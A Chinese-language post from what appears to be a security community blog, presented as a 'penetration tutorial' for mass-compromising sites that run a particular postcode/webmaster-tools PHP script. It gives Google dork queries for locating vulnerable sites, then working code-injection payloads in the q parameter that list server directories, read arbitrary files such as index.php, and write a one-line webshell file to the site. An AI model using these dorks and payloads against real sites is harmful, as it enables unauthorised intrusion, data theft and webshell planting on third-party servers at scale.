• 投稿邮箱:admin@xssec.org 查看详情
  • 本站教程默认解压密码:666
  • 官方新浪微博:Porry呦
  •    9个月前 (05-30)  渗透教程 |   抢沙发

    关键词:

    inurl:yb/yb.php

    intitle:站长工具网

    intitle:实用查询工具

    inurl:yb/youbian.php

    inurl:yb/youbian

    inurl:yb/index.php

    如查询“湖南省”,请输入“湖南”,支持邮编或区号反查地理位置

    查询省名、市名、县名、村名的时候请去掉省市县村后缀

    利用方法:

    扫描整站文件:?q=${@exit(print_r(scandir($_GET[d])))}&d=../

    读取指定文件:?q=${@exit(print_r(file($_GET[d])))}&d=../index.php

    写入一句话:?q=${@exit(var_dump(file_put_contents($_GET[n],$_GET[d])))}&d=www.xssec.org测试&n=./xin.txt

    一句话地址为:http://www.xxx.com/yb/xin.txt(自己改写入一句话的路径)

    站长工具源码漏洞批量拿站

    站长工具源码漏洞批量拿站

    说明:打开查询页面 把一句话加到php的后面就行了。

     

     

     

    除特别注明外,本站所有文章均为新世纪安全社区原创,转载请注明出处来自http://www.xssec.org/419.html

    八块腹肌挂腰间,续写另类拳皇篇。

    发表评论

    暂无评论

    
    切换注册

    登录

    忘记密码 ?

    您也可以使用第三方帐号快捷登录

    切换登录

    注册

    扫一扫二维码分享